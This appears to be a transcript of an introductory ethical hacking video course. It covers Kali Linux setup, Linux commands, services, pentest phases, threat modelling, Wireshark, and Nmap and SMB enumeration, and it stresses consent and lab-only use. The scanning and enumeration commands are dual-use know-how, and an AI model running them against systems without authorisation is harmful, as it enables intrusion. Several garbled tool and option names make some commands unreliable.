start the course by defining the term ethical hacking. It is an ongoing cycle of research and attack against a target or a boundary. It's a set of processes and procedures used by penetration testers in order to circumvent the controls of a certain information system. These controls can be categorized into technical, administrative, and operational. At the end of the day, the owner will be presented by a professional report that shows all of these controls, the vulnerabilities, in addition to an executive summary of the engagement. So what is an ethical hacker? Ethical hacker is a person who can access the system on behalf of its owner after getting a written consent. It's very important here to obtain the consent. The objective of ethical hacking or penetration testing is to make the world a safer place. It's a real world audit in order to reveal our security posture. We have different types of hackers. We have the white hackers, the black hackers, and the gray hackers. The white hat hackers are actually the penetration testers that we will refer to during our course. We're the good guys. A white hat hacker will have access to the system on behalf of its owner in order to test it and reveal the security weaknesses it has. Meanwhile, black hat will access the system without a consent from the user, without a permission from the user to perform some hidden agenda. Meanwhile, gray hackers, they lie in between. They usually access systems without permission, but they don't have some hidden agenda. They just do this for their own benefit. The name of the game is to identify vulnerabilities in the system that can be exploited. It is important to note before going on with this course that the skills that you will learn, you should not leverage them to break into anything that you don't have permission to. It is completely illegal to access systems that you don't have explicit or written permission to. We will perform everything on our VM, virtual machines, or the systems that you actually own. Again, I repeat, this is very important. Please do not exercise the skills that you will learn during this course just to attack systems that you don't own. So why are we using Kali for this course? Kali is considered to be the premier operating system for penetration testing, forensics, security audit, and other related uses. It's an easy to use platform and consider it as a weapon for you in order to perform any kind of security engagement, because it is an all-in-one solution that has lots of security applications, as we're going to see. Kali is the successor of Backtrack, which used to have many applications that performed similar functionality. This duplication in applications has been removed in Kali. The main features of Kali are that it's always a free system. It's a robust solution that can be updated very easily. It has more than 300 penetration testing tools, which is really awesome. It has support for lots of devices, including Raspberry Pi, microcomputers, Android. Discover that during the course. It's completely customizable and it has multilingual support. The main tools that we will be exploring during this course are the ones listed here and more. But just to give you an overview, some of these tools are Metasploit, that is used for network penetration testing, the Nmap for vulnerability scanning, Wireshark to monitor the traffic, AirCrackNG to crack into wireless network, John the Ripper password utility, and so on and so forth. We will discover these applications and more, as I said, in this course. It's not only theoretical. We will see how to use and leverage the information that we will learn on Kali machine directly. There are different ways to install and use Kali. The first approach is to download the ISO image from the website, burn it to a DVD, and install it from there. The second approach is to install the Kali Linux on an SD card or a USB memory stick and boot from there. Mainly this is used for microcomputers such as Raspberry Pi. Another approach is to use and boot from PXE environment over the network and install Kali from there. What we're using for this course is the last approach, which is downloading VMware image and importing it onto our VMware player. So let's roll up our sleeves and start digging in. In this video, I will show you how to install Kali Linux, which is our command center in this case, on VMware Workstation Player. You need to go to VMware website and click on the download link here on the left side, and then click on the Workstation Player. It's a free tool, by the way, if you're using it for your personal use, and if you're using it for commercial use, it has like a 14 days before the license expires. So feel free to download this player and install it. Once you open it for the first time, it will look something like that. It's empty. There is no virtual machines to run. So what we need to do is to go to offensive-security.com website and download the Kali virtual machine image from there. You can go to projects, Kali Linux and virtual machines or virtual images. You go down under the VMware images tab, just download the relevant machine for you. In this case, I downloaded the 64-bit machine. It's on my machine already. It's here, compressed. You just need to uncompress it. Fine. And these are the uncompressed files. You just need to go to your player again and press on open a virtual machine. Navigate to the files extracted, locate the VMX file and press open. As you notice, the virtual machine name pops up under the home button. You can directly press on the play virtual machine, or you can edit the virtual machine settings in terms of resources. In my case, 2 gigs of RAM is just fair enough for the machine to run. So I'll keep the default settings and press on the play button. Setting it for the first time will actually take a couple of minutes. So I will pause the video and get back to you once the login screen appears. After some time, the login screen will pop up and you'll have to enter the username, which is root. Press next and enter the password, which is in our case the opposite of root, TOOR, and just press sign in. Now Kali is preparing the desktop for the first time. Let's wait for a while, and here you go. This is Kali's desktop. In some cases, the resolution will be very minimal and you need to set up your workspace for starting with Kali. For this purpose, you just need to go here on the show applications button and type settings. In this case, settings is already there. So just type settings and open settings. Then you need to go to devices, displays, and you can change the resolution from here. After installing the Kali Linux machine, now we will install the victim machine, which is Windows 10. For this purpose, we will have to go to a link provided by Microsoft, which I will share within the resources of this course. You can download here a trial version of Windows 10, which expires after 3 months. Just select the virtual machine that you want, in this case MS Edge on Windows 10, and the platform is of course VMware, and just download the zip file. Note that the password is password then exclamation mark. I've already done that. I've downloaded the zip file and extracted the zip file as well. Now, as we did for the Kali machine, just go to the workstation player interface, go to home, then open a virtual machine, navigate to the extracted files, select the OVF file and press open. Here you can name the Windows machine. I'll name it Windows 10, and then you can press on import. Importing the Windows machine will take some time, actually a couple of minutes, before it populates on the interface of the player. Now you can see that the Windows 10 machine is populated. As we did for the Kali, we can edit the virtual machine settings. Actually here the memory use is 4 gigs. I'll downgrade it to 2 gigs and press OK, and then we'll run the Windows machine. Remind me later. And here we go. Now you have the Windows 10 machine up and running, and we have our lab set up. Before getting into the technicalities and the applications that run penetration tests, I'll take you through a quick overview on the applications and the layout of the Kali desktop. So if you go here to the applications menu, you will see that as we said, that we have more than 300 applications used for penetration testing, security auditing, forensics, etc. These 300 applications are well spread over these categories of information gathering, vulnerability analysis, web application analysis, database assessment, password attacks, wireless attacks, reverse engineering, etc. So it's now easy to spot an application directly under the category of attacks that we are planning to do. We'll go into the details during the course. Here, if you press on the places, it's actually file manager. Simply, as in Windows, just by double clicking folder. You can go there, you can see the desktop, documents, trash, which is the recycle bin. So it's a simple file manager. Here is the calendar, and here are the workspaces. The concept of workspace is really important, especially if we're planning to do multiple or running multiple applications. So for example, if I have this terminal open here and I have maybe other applications, this is in workspace 1, I can go to workspace 2 and open other applications without even closing or disrupting the initial applications open. So this is a very nice feature in Kali. Here you can see the wired connection, wireless connection maybe if there is any, but virtual machines usually cannot access the internal wireless card here. I'll show you later on during the wireless attacks how to set up this. You can as well turn off the machine here, lock it, and go to the settings. So feel free to just explore desktop environment. Kali requires constant updating to keep the tools you are using in functional order. We have two main commands for this purpose. We have the apt-get update and we have apt-get upgrade. So what's the difference between the update and the upgrade? Update, actually, it lists the available packages and their versions, but it doesn't actually install or upgrade any of the packages. It just tells the package manager what is actually up there available for us. But if you want an actual upgrading of your packages, you will have to use the apt-get upgrade command. So I will run them quickly here. Update. As you can see, it's working. You should run it oftenly actually. And the apt upgrade, I did run them actually before this video, and if you want efficiency, you should run them on a daily basis, or it will take some time. Actually, it can take up to an hour for the upgrade command. Now I'll teach you an efficient way to do the update and the upgrade by using an alias. So with one command, you can actually invoke the two commands at once. For that, we need to do some kind of changes to the bash rc file. For this purpose, we use the command leafpad and we direct this file to open, and then we press enter. It will actually open the bash rc in a notepad file, and if you expand it here for a while and go down, just go down to the place where there is a hash alias. Press enter here and write alias update sys. So we will now use update sys to reference the two commands, which are apt-get update and upgrade. So update sys equal apt-get update and apt-get upgrade, and we close the parentheses. Notice here there's a star. Whenever there's a star, it means that the file is being edited and it's not saved. So make sure to save the file. Once you save the file, the star will be gone, and then close it. Now we have the file updated. So to be on the safe side, let's close this terminal and open a new terminal and use the alias that we've just created. Update sys, press enter. It will run both commands at once. It will update your system and will upgrade all the packages available. Understanding the different color codes of Kali files will make it easier for you to get started. Let's go first to the terminal and issue the cd/var. Let's do some listing here. You'll see that there are lots of blue namings here. So the blue color refers to a directory. So these ones here, backups, cache, lib, etc., these are the directories. Meanwhile, this sky blue color, like lock and run, refer to a symbolic link. So basically, it's a link. Now, if you go like cd into backups, and let's do listing again, you'll see different color coding. These ones that are in red are considered to be archive files. So .gz, it's .gunzip, it's like rar file or a zip file. These are considered archive files. Meanwhile, the ones here white, sometimes you can see them in green as well. So these are executable files. So these are files on their own that will run whenever you invoke them. They can be green or white. Graphic files such as JPEG, PNG files are usually color-coded in pink. Meanwhile, devices are color-coded in yellow with a black background, and broken links are color-coded with red with black background. I'm sure you familiarize yourself with available tools in Kali along with their categories. So before going forward, we just need to learn a couple of Linux commands which are very useful before continuing with this course. We're not going to go deep into scripting, but it's just very simple and basic Linux command that will help us jumpstart and continue with the rest of the videos. Many of the applications that we will use have graphical interface. So we will be able to make most of our penetration tests within these graphical interfaces, but learning command line is very powerful and very helpful. I'm sure you will love it. Starting with the first command is the password. So let's jump directly to the machine demo. So I'm still using my default password. Let's open a terminal here and let's expand it. The best practice, of course, whenever you log in to any new machine is to change your current password. Tool provided by Kali is password. So we just type this password here and it will prompt you to enter your new Unix password. So I'll enter my password here and write it again, and here you go. My new password is set up. The next command is the ls command. ls means list. So if I press enter, it will list all the directories in the file in my current working directory. ls has some arguments that can help me explore more about the files I'm listing. For example, ls-l. If you want to know more about these arguments that you can pass, you can use help or manual. So for the ls program, we will type in help, and here you can see all the help provided with the ls program and all the arguments and how we can use all these arguments. It's pretty much helpful. On top of that, you can use the man command as well. So man means manual, man space ls. You hit enter, it will show you the manual provided with this command. What's the difference between both? Actually, some of the programs provide manual and some of the programs they do not provide manual. So it depends on the program that you are using. The next command is cd or change directory. So if you want to know your current working directory, use the command pwd. So it's print working directory. So it's important here to mention that all these commands in Kali and Linux in general are case sensitive. So if you write p uppercase wd, it will tell you that the command is not found. So everything you should write goes in the lowercase. Okay. So this is my current working directory, which is the root. I can list the files. I can change using cd. I can go to any of these directories here, for example, music. Sorry, this is the mistake I did because of the case sensitivity. So music, M is uppercase, and here you go. List, the directory is. So if you want to go back to the original path or directory you've been working, so you use cd space ... and you are back to the directory. You can as well toggle through the previous commands that you used using the up arrow and down arrow. Okay, so instead of writing the command again, you can just go up and down, and even if you close the terminal and open it again, you can still use the up and down buttons for the sake. The next command on our list is the make directory. So let's do the ls again. Let's go in to music folder and let's create a directory, mkdir pop ls again. So here's the directory. I can remove this directory as well using rmdir or remove directory, pop ls again, it is removed. Some of the other important commands that we will use is the cat. So cat actually helps us print the content of the file to the terminal. For example, I have a file on the desktop called demo.txt. So let me go to the desktop again ls cd to my desktop, and here's the file. If I want to print the content on the screen, I use cat, then I write the name of the file, and here you go. This is the content of the file displayed. If I want to change the content of the file, another command called nano space, I write the name of the file again, and the nano program opens, and I can here actually edit the file. Like I can add regards at the end and Control X. It asks me, do you want to save? I say yes, and here we go. If I nano again, or let me use this upper arrow here, you will see the file updated. One of the important commands that we will be using during this course is the grep command. Grep actually searches for a string in a file, and this is very important when we are doing our analysis. Sometimes we want to search for a certain text within a file or within a list of returned values, so this application will help us a lot. So I will use the same file, which is demo.txt, and I will search for the word command, for example. So I use grep command and name of the file, okay, and it returns back the command word along with the line where this word appears. It's a very useful command, and there are lots of variants to this command. We will explore them during this course. Another command that as well can help us, especially when we are looking into huge files, we can use the less command. So let me search for a huge file here. Let me see. Okay, so actually this is a file called, it's a log file actually, user.log. So I'll use less, and then I will paste this file name here and open it. So it opens the file, but not at once. You can sequentially go forward or backward in this file by using the Control F to go forward and Control B to go backward. So it just fetches the file bit by bit, so you'll be able to view it moderately. And if you want to quit, just press Q and you're off the file. Another important command that we will be using during this course is the ifconfig, which is similar to the ipconfig on Windows machines. It displays the current IP that we're using, as well as the subnet mask and the default gateway. The last command I'll talk about is the locate command. Locate command actually finds a file that you're searching for within the file system in a very quick way. But before that, it's mandatory, or it's advisable, to use the update db command. This command will build the local database for all the files on the system, and now when you're using the locate, you will be using this database to return the location of the file. So suppose that we're searching for the file cron tab, it will return the file in all these paths. So here you go. If you want to clear the screen, just use the clear command. It clears everything, and you can as well still use the up and down arrows. And the final command I want to talk about is the uname command. It shows you the version of Kali you are working on. So that's it for the Linux commands. In this section, we will explore main services of Kali. The default installation ships with several services which are pre-installed, such as SSH, HTTP, and MySQL. So now we'll see how to enable and disable these services. Let's first start with the most common service used, which is the SSH, which is usually used to provide remote access to computers over a safe and secure protocol that transfers data in an encrypted way. So, as we said earlier, that SSH is already installed in the distribution of Kali. So, how to enable this service and start it? It's very easy. We use this command, service SSH start, and then press enter. Okay. How do we know that this service is running? Actually, we will type the command netstat minus np, and then we pipe it out to the grep command, and we tell the grep command that print the lines that have SSH, And here you go, you will see that SSH, which is running on port 22, is currently active. So if you want to disable the service, it's very easy. Instead of start, we use stop. Click enter again, and let's use the same command, netstat, and pipe it out to SSH, and here you go, the service is not running. The next service we want to explore is the very practical HTTP service, which is mainly used to host a website in our case, or lure the user to download or click on a file that is hosted on a website in order to download it and install it on the computer. So again, if you want to start the service, it's service Apache 2 start, and if you want to see if the service is running, you go to the same netstat command, and instead of SSH you type Apache 2, and here you go, you will see the service Apache 2 running on port 80. You can stop the service as well by using stop instead of start. So it's pretty straightforward. Service, the name of the service, then start or stop. Now we will see how to install services that are not available in the distribution, such as FTP. So if you go, for example, service, the service is called FSFTPD start. It will tell you that the service is not available, so it's not installed. How do we install it? We use the command apt-get install FSFTPD for daemon, and here you go. It will take some time to install the service. Let's wait for a while. So the service is now installed. If you want to run the service, as we did before, service vsftpd start. And how to verify if the service is running, we use the netstat command fsftpd, and here we go. You'll see that the FTP service is running on port 21. FTP service is vulnerable, so actually we will not be using it in this lesson or this course. So I'll directly uninstall it, but the purpose was just showing you how to install and uninstall services that are not available in the original distribution. If you want to uninstall it, you go apt-get remove vsftpd, and it will remove the service directly. Now we saw how to start and stop services, but this doesn't come handy if you every time, for example, you want to boot a Kali, for example, to start your website or start your services. So there's a way that to enable these services from starting up at boot time. For this purpose, we will use the command, or it's a script, update -rc.d ssh enable. So this command will enable SSH to start automatically at boot time. We can do the same for the HTTP protocol as well. Apache 2 enable. And you can guess, if you want to disable the service, instead of the enable, just like replace it with the command of disable. So it's pretty straightforward, pretty easy. Just get yourself comfortable with these commands before going on to the next video. Thank you. If you need to have a successful exercise of penetration testing, you need to have a plan in place. Now we're gonna talk about the phases of a successful penetration test. And there actually generically are 5 phases, because on the internet and on many different resources, you can see that these phases can be 5 or 6 more or less. The first phase is called reconnaissance, then scanning, then exploitation, maintaining access, and then reporting. So in the first phase, which is the reconnaissance, actually the attacker tries to gain information about the target. This approach can be active or passive. The attacker tries to have a blueprint of the security profile of the target, whether it's an organization, a person, etc. So it involves gathering information about the network that we are attacking and attempt to create a profile of the organization's networks, systems, and applications. Some of the most common tools used in the reconnaissance phase are the Whois utility or smart Whois and the NS lookup. You can as well use open information which is available on the internet, such as the contact names of the company, available phone numbers, email addresses, locations and branches, even the partners that the company has relation or deals with. You can as well check the news about some mergers, acquisitions. The website of the company is very important. Some links on this website which might take you to the company's policies and procedures. So it's utilizing the open source data available. The second phase is scanning, and here our goal is to discover the open ports, the available access points, the operating systems that are used, and to uncover the services available to us. The second phase is the scanning phase, and our goal here is to discover the open ports, access points, operating systems, and uncover services running on these ports. Our goal is to perform some external and internal scanning, ping machines to determine network ranges, and to come up with a profile of the individual systems. Some of the common tools used as well are the ping, traceroute, superscan, netcat, nmap of course, and others. Enumerating is an important aspect of this phase. The goal of enumeration is to paint a fairly complete picture of the target. So to enumerate a target, a tester tries to identify valid user accounts or poorly protected resource shared, some using directed queries or active connections from the target. The type of information sought by testers during the enumeration phase can be usernames, groups, some network resources and shares and applications. Some of the tools used in this phase or subphase, as we're talking about enumeration, are Active Directory lookups to uncover any vulnerabilities in users and groups, discovering the NetBIOS name with NBT scan. We will see this in the upcoming videos. Using SNMP util for the SNMP, and employing Windows DNS queries, along with establishing some null sessions and connections. The next phase is exploitation. Here the actual penetration takes place. I didn't list the tools because they are all the tools available on Kali Linux, as we saw before in the videos. Maintaining access is to make sure that we still access the target. The last phase is reporting, which is the most dreaded part. It usually contains an executive overview and technical summary, but we need to get used to documenting our work and findings. It's the only professional way to get the job done. Threat modeling can be understood as making sense of the complexity of the system we have at hand, whether it's a mobile application, web application, or even a network, and then by identifying all the possible threats it might face, and then by assessing those threats. In simple terms, it's about finding different ways in which our system can be attacked and subsequently designing countermeasures to stop these attacks. Threat modeling helps us become more proactive and strategic in our operational and application security. The ultimate goal is to reduce the attack surface and focus on the investment of the business itself. It actually starts by a couple of questions. What are we working on? So we have to identify the assets, and then what can go wrong? So after identification of the assets and having the architectural overview of the system, we ask ourselves many questions. How can the system be attacked? What can go wrong? So we need to pinpoint those questions. After that, what can we or what are we going to do about it? So here we start thinking of the countermeasures and the controls we will have in place. And at the end, we need to assess our job. Did we do a good job? Threat modeling actually springs from the trivial risk assessment model. We need to identify threats in the first place, whether it's process, it's a software, it's an attacker, anything can be a threat. The threat can attack our systems by taking advantage of weaknesses we have or vulnerabilities we have. And the purpose of threat modeling is to close the gaps of these vulnerabilities, is to put controls in order to close those vulnerabilities. So why threat modeling? Here are some of the benefits of threat modeling. It helps us identify and investigate potential threats to our system. It helps us understand our vulnerabilities. It helps us identify the logic between our system, how data flows, how instruction flow. It helps us create a set of standard documents that can be used to create specifications. So it's about systems and documenting the workflows and understanding our systems better. It helps us eventually in reducing the attack surface, reducing the threats, and closing and fixing many of our vulnerabilities. And of course, it helps us define the overall security posture of a system or an application. Different methods and techniques are used by pen testers, by practitioners, by analysts to understand the variety of information security risks. Some of those structured threat modeling techniques are attack trees, stride method, elevation of privileges, TMAP, PetriNet, data flow diagram, activity diagram, and risk reduction overview. Some of the most famous models is the stride model. So after having the architecture overview or after simplifying our process or system and projecting it on a diagram, we start thinking about what can go wrong. How does this web application or a mobile application workflow goes? Do I care about what can go wrong with this application? For example, does it have financial information? How about the content of where is the data stored, etc. So we spend much of time in analyzing each of the steps in our architecture overview, and one of the simplest techniques that can help us is the stride. Stride is a mnemonic for spoofing, tampering, repudiation, denial of service, and elevation of privilege. The technique is used for identifying threats in these 6 areas. It's actually another taxonomy for the famous triad, the CIA, the confidentiality, integrity, and availability. So the ultimate goal of Stride is to go through the process and start asking ourselves, how can someone spoof his identity? How can someone tamper our data? And how can we make sure that there is no repudiation in place? How can information be disclosed, and how can someone take advantage of some vulnerabilities to provide a denial of service? And how can someone access the system in an unauthorized way? And many mitigation approaches exist, such as using passwords, multi-factor authentication, and digital signatures to protect against spoofing attacks. And we can use permissions, access control lists, and again, digital signatures to protect against data tampering. We can use secure logging, auditing, and digital signatures, of course, to protect against repudiation. Encryption, access list controls as well can be implemented to protect against information leakage. Permissions, access controls, quotas, for example, some filtering techniques can be employed to protect against denial of service, and lists to protect against elevation of privileges. We can implement the techniques of input validation and access controls. I'm sure you've heard about the famous Wireshark network sniffing tool, which is used to understand protocols, debug issues on the network, and of course, analyzing traffic. The Wireshark uses the libraries on Linux and Windows called libpcap and wimpcap, Linux packet capture and Windows packet capture. As you might have seen before, if you use this tool, you will get lots of traffic. So the secret to effectively use the tool is to use the capture and display filters. So before demonstrating how Wireshark works, let's go back to basics and see how we establish a basic TCP TCP connection. So actually, when there's communication between the client and a server, the client sends a SYN packet. The server replies back with a SYN ACK packet. Then the client confirms back with an ACK packet, and here the connection is established. So this is a full round of TCP connection. You might have seen that the server always replies with the sequence number +1. Then the client replies with a previous sequence number +1. No need here to go into the details. We're just explaining that in order to make an effective use of the Wireshark. Similarly, the same thing goes when we are terminating a connection, a three-way handshake as well. So the client sends the server a FIN packet, then the server replies with a FIN ACK packet, then the client confirms with an ACK packet, and the connection is terminated. What we will demonstrate here in the next live example is this scenario. From our Kali machine, we will connect using our previous example, the Netcat, and we will try to use the previous example of texting using the chatting between the client and the server. Then we will fetch the traffic and analyze the traffic and see what happened. So here, if you want to open Wireshark, you go to the menu under sniffing and spoofing. First of all, you need to filter the interface that you want to capture traffic on. If you can see here, by default, you have lots of filters, and if you capture all the traffic coming on these filters, you'll end up with a huge amount of data and information. So we're interested in only filtering or using the wired interface, which is basically the Ethernet interface. So after that, we press on the Start Capturing Packet here. It is very important to understand the layout of the Wireshark. It is divided into 4 parts. The lower part here is the network. As you can see, it's a low-level data, hex data, bits, etc. The upper part here is the capture filter. So based on the filter that we identified before, the capturing is taking place here. This section here is the capture engine. It's actually capturing the traffic based on the capture filters we defined before. And on top here, you will see the display filters. After we stop the packet capturing, you will of course end up with a huge amount of data. And this is the best way on filtering and querying the data that we will end up with. Now it's working fine and it's sniffing the traffic. We will go to the cloud server here, Netcat, and we will invoke this command. So here we will open port 2222 and we will listen to any traffic coming on port 2222. From our Kali machine, we will open a terminal and we will invoke this command, which is an Netcat, then NV option, then the target IP address, and then the target port. Now we were able to establish a connection between Kali machine and the Windows cloud machine. Remember the chat example we did before? Let's do it here all over again. Hello from Kali. Then we go to the machine here. We will see the text prompting. We can reply back, and if you go here to the Kali again, we will be able to see the message. So now a certain activity has been taking place between the client and the server. Now we can go here to the Wireshark and stop the packet capturing. This is a small file, but in the real world scenario, you might end up with a huge amount of data here. So these display filters will help us a lot in working with the file. We can filter based on the source address, the destination address, the protocol type, and the port. For example, if you can go to, you just press ip.source, and the source here in this case is 211.130, and you press enter, you'll be able to get this information here. If you want to search on the destination, 173.248.132.230, here you go. As you can see here, the data contains R protocol, NBNS, another R protocol, then TCP protocol, etc. If you want to filter on the TCP protocol, just write here TCP and then press enter. You will see here what happened actually in the previous example. The Kali machine with the source IP of 130 initiated a connection with our cloud server here. As you can see, this is the start of a three-way handshake. This is the SYN packet, and then the SYN ACK packet, and then the ACK packet. Then connection has been established. If you want, you can follow a stream in order to get the cream. So if you right click here and then follow TCP stream, it will actually give us the end result of actually what happened in this connection here. Now if we start capturing packets again, suppose that I don't want to save this, and go here to my Kali machine and stop this connection. I'll stop the traffic again and filter again for TCP. You will see the three-way handshake for terminating the connection. FIN ACK, and then the ACK packet. Port scanning is the process of checking for open ports, TCP or UDP ports on a remote machine. It is very important that you think of the traffic implications of your scans before you perform any, as it might have possible effects on the target machines. We have two methods for scanning a TCP port. The first method is called connect, and the second method is called SYN/stealth. The first method is purely based on the three-way TCP handshake mechanism we saw earlier. The connect port scanning involves attempting to complete a three-way handshake with the target host on the specific port. If the handshake is totally completed, this indicates that the port is open. As for the SYN scan, it is a TCP port scanning method that involves only sending SYN packet to various ports on the target machine without completing the three-way TCP handshake. If the TCP port is open, a SYN ACK packet should be sent in return, and this means that the port is open without the need to send the final ACK packet to the target machine. It is called stealth because with the early and primitive firewalls, this method, like opening half a three-way handshake connection, often bypass the logging of the firewall. But this is not the case anymore with the new firewalls, as your scans will be detected. UDP scanning is different than TCP scanning, as we know that TCP is connection oriented while UDP is stateless. So it doesn't involve the three-way handshake mechanism. So scanning a UDP port is somehow different than scanning a TCP port. It is actually important to get into these details, as understanding these basics will help us a lot going through the course. So how does the UDP scanning work? Actually, an empty UDP packet is sent to the specific port, and if the UDP port is open, so we expect no reply will be sent back to us from the target machine. But if the UDP port is closed, an ICMP port unreachable packet should be sent back to us from the target machine. UDP port scanning is somehow unreliable, as firewalls and routers have the option to drop the ICMP packets. So this can be misleading to us. So people often forget to scan UDP services and stick only to scanning TCP ports. One of the most popular and robust port scanners to date is the famous Nmap tool. Believe me if I say that I saw complete penetration testing reports which are totally based only on Nmap tool. So it's a great tool. It's very important to understand because this will help you a lot in your penetration testing career. It has numerous features, not only just port scanning, as you will see. The default Nmap TCP scan will scan like 1,000 most popular ports on a given machine. But again, consider the amount of traffic that you are generating. So this default 1,000 ports can generate up to 70 kilobytes of traffic. This is only scanning one port. So how about scanning like all the ports? This is only scanning 1,000 ports. So how about scanning all the ports? That's 65535 ports on the machine. It will actually generate around 4 megabytes of traffic. So 4 megabytes of traffic just for one host. How about scanning the full subnet? For example, the full subnet for a C-class network, which are like 254 hosts. It will generate lots of traffic that can compare to 1 gigabyte of traffic. So imagine if we scan a full Class B network. Imagine the size of traffic that we will be generating. Before we go into the different options of how to use Nmap, it is important to understand and to master the basic options because it can get very complex. Nmap is a case-sensitive tool, So make sure you type in the options as displayed on the screen. The -S option stands for the TCP SYN scan, which is the quickest way to perform a scan. As we demonstrated before, it's based on half opening the TCP three-way handshake. As for the ST option, it basically we're telling the Nmap to use the three-way handshake to establish connection with the target and to determine if the ports are open. When we are scanning ports that are based on UDP, such as DNS, SNMP, and DHCP, we need to use this option, the -SU. Another option to perform scan is to use the SN option, which basically sends TCP packet with null or no flags set, because the SYN packet and the SYN ACK and the ACK packets have flags set, like the sequence flag and the ACK flag. So here we're sending a packet with null flag set or zero flags set. So if the scan returned an RST or REST packet, it means that the destination port is closed. However, if nothing is returned, it means that the port is open or filtered. The -SN option stands for pinging or sweeping the target. Here we are just pinging the target just to know if it's alive. So if it is alive, we might take into consideration the next step of scanning them. So it's just probing the network without actually scanning. The -V option is to increase verbosity. This will give us extra information and progress information about our scan. The -T template, you can use it from 0 till 5. It's basically timing template. The 3 is the default and 5 is the fastest one, while 0 is the slowest one. It can take you from a couple of milliseconds performing an insane scan, while it can take you to a couple of minutes performing a paranoid scan. The -SV option is to enumerate and determine the services and the version of the OS that is running on the destination host. -P stands for port. OG is to redirect the output to a text file for further analysis. The F option is for the fast mode. -O is to check the OS type. -A is to detect the OS and services running. The PN is to skip discovery and just pretend that the host is up and running and implement the scans. And the -script is to inject the Nmap scripting engine, which is very useful in performing what's beyond just port scanning.
The server message block SMB protocol has a poor security track over the last decade and years due to its complex implementation and open nature. From the unauthenticated SMB null sessions in Windows 2000 and Windows XP to many bugs over the years. Lots of versions have been devised since Windows 2000 and XP with SMB version 1. Then we have SMB version 2 with Windows Vista and Windows 2008. We have also SMB version 2.1 with Windows 7 and Windows Server 2008 R2. Then SMB version 3 with Windows 8 and Windows 2012. The latest SMB versions are 3.0.2 with Windows 8.1 and Windows Server 2012 R2, and the latest one is SMB version 3.1.1 on Windows 10 and Windows Server 2016, and this is the most secure version. There are some tools in Kali Linux specialized in getting NetBIOS information, such as NDTCAN. Then we use the -R option, then we put the IP. As you can see, it will give us the address, NetBIOS name, the server, the MAC address, etc. These are basic information. We also have another tool, which is enum for Linux. Then we use the -A option, and then we put the IP. This tool actually, you can have more information than the NBT scan. The target Windows here, Windows machine, is recent, so you will not be able to find these vulnerabilities that exist in the previous SMB version. But to give you an overview of what this tool will give, you will have information about the users created on this machine, the group created on this machine, the password policies, the details of the password policy, information about the host, information about the OS, and some share information. This is actually a good and important tool to use if you want to discover SMB vulnerability. Another tool we have, if we go back to the Nmap, As we said that the NSE scripts are various, and one category of the script relates to SMB OS coverage. The script goes this way: invoke the nmap command. This is the option to invoke a script, and the script name is SMB OS coverage, then the target. Here we go. You'll get enough information to prepare your attack, but again, since I'm using the latest version, it will directly quit here. So as we said earlier, it's very important to understand all the attributes of the nmap before continuing with this course. There is a tool called ZenMap which has all the presets of what we're going to study in this video, but I advise you to go through this video in order to understand the details of each of these attributes. First of all, if you want to have an nmap target selection, the default command is nmap, then you put the IP address. So I'll put the IP address of my local machine, and then you press enter. Let's do this example here. Here is the result. It finished in 6.34 seconds, and these are the ports open. If you want to scan a host name, you can do nmap www.abcd.com, and it will give you the same results as one previously. If you want to scan a range of IP addresses, you go nmap, you type in the IP address and dash the range, and then you press enter to scan all the IPs within this range. If you want to scan a subnet, you scan it this way. If you have a determined list of IP addresses, like I did here, put them in a text file. This is the text file here. So this is the format of your text file. You put all the IPs in there, and then you issue this command nmap -il uppercase, then the name of the file, and then you press enter. It will scan all the IPs in this file. Going forward, we will see how to select ports or range of ports in order to scan. If you want to scan a certain port, this is the command you need to issue, -p attribute, and after that the name of the port or name of certain ports in a comma listed fashion. And then you put the IP on the target machine, then you press enter. Here you see that the SSH port on the target machine is open. If you want to scan a range of ports, so you use the same command, for example, scan port 1, 2, 100 on this target machine. It will go through all of these ports, and here we go, we got the same result. If you want to do a fast scan, you use the attribute F, which scans the most common used ports. The default, it's good to mention that the default nmap command scans 1000 ports, and this can take some time. So if you want to scan the most common port numbers, you use the -f attribute. And here you can see that we have the SSH port open in addition to the NetBIOS port. These SMB ports are open. If you want to do an extensive scan for all the ports, issue this command -p and then the IP address. -p and then minus and then the IP address. It will take a huge amount of time because it's scanning almost all the 65,000 ports, and a similar intense IP scan as well can be used using this command. Like, you name all the ports here 1 till 65535, and then you issue these attributes -t4, -a, -v. What are these attributes? As I said, the -p is the port numbers from 1 till 65535. The -t4 template is the timing template. Actually, this is an attribute that can go from T0 till T5. T0 being the slowest type of scan, and T5 being the fastest type of scan. Here we are controlling how is the response of nmap and how fast it is in the scan. So actually this is a timing template, and it gives the user an easy way to tune how fast nmap performs. As we said earlier in the video previously, that goes from 0 to 5, 0 being paranoid, 1 being sneaky, 0 being paranoid, 1 being sneaky, 2 being polite, 3 is the normal, 4 aggressive, and 5 insane, which is right. The -a attribute, actually, it's an option that lets nmap make an effort in identifying the target OS, the services, and the versions. It also does a traceroute and as well applies some NSE, which is engine scripts, in order to detect additional information. This is a huge scan, and it's actually quite noisy as it applies to many different scans. If you want to select the type of the scan, you issue these commands nmap -st and then the IP address of the target machine. As we said earlier, we have two types of scans: the send scan, which is the default one, and the connect scan. If you want to force Nmap to use the connect scan, you issue the attribute -st. So here it initiates a three-way handshake, like you send the ACK and wait for the target machine to reply back with a send ACK, and then the Nmap machine will send RST packet in order to complete three-way handshake. If you want to use the default type of scan, use -ss attribute. If you want to scan UDP port, you use the attribute -su, and then you need to specify the port types or the port numbers that you are scanning. Let us say here 123, then 161, then 162. These ports are the SNMP and the SNMP trap, as well as the NTP. Let's see how it goes here. So as we said earlier, UDP scan is different than the XP scan because it doesn't include a three-way handshake. So as you see here, the Nmap replied with the results for the ports. Actually, three of these ports are closed. To have more information, many more examples can be given, like Nmap -a, then the IP address. This scan, as we said earlier, the -a attribute will do its best to determine the OS type and the services running, and it will use the NSE scripts in addition to doing the trace route. Another example is having a light banner grabbing detection by using this command sv and then version intensity. Here we're controlling the intensity of the scan. Say 0, and this is the target IP here. The -sv attribute determine actually the services running on the target machine. It actually probes the open ports to determine what services and version they are running. When running the scan against a target, so as you see, these are the results of the -sv attribute. It shows that the SSH port is open. It as well lists the version of the SSH that is running on the target machine. If you want to do an intense scan with no ping, so Nmap can consider the target port up and running, we use this command -t for the template, which is fast, a attribute, and then the pn attribute. This is the attribute that considers the target machine up and running, and the v attribute, which is the verbose or show verbose attribute, which gives us the status of the scan, of what's going on, and then the target IP address. Let's see. So as you can see, it's giving us a real-time update of the scan. And here you go. It's actually a good scan. It loaded some NSE scripts, and here are the results. The SSH port is open and the SMB ports are open. It also gives us the TCP IP fingerprint, which is a combination of passive data that defines the TCP IP stack on the target machine. We're one hop 